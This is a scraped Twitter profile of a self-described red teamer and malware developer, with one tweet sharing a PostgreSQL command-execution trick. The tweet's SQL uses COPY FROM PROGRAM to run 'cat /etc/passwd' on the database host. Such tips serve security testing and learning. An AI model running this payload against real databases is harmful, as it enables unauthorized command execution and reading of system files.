OtterHacker (@otterhacker) 's Twitter Profile
OtterHacker

@otterhacker

Professional redteamer and malware development enthusiast ! I will share some tips and experiences. Look at my work here : otterhacker.github.io

ID: 1432380122959687680

linkhttps://otterhacker.github.io calendar_today30-08-2021 16:30:18

717 Tweet

6,6K Takipçi

76 Takip Edilen

OtterHacker (@otterhacker) 's Twitter Profile Photo

I'm in my database period RCE with PostgreSQL DROP TABLE IF EXISTS files; CREATE TABLE files(filename text); COPY files FROM PROGRAM 'cat /etc/passwd'; SELECT * FROM files ORDER BY filename ASC;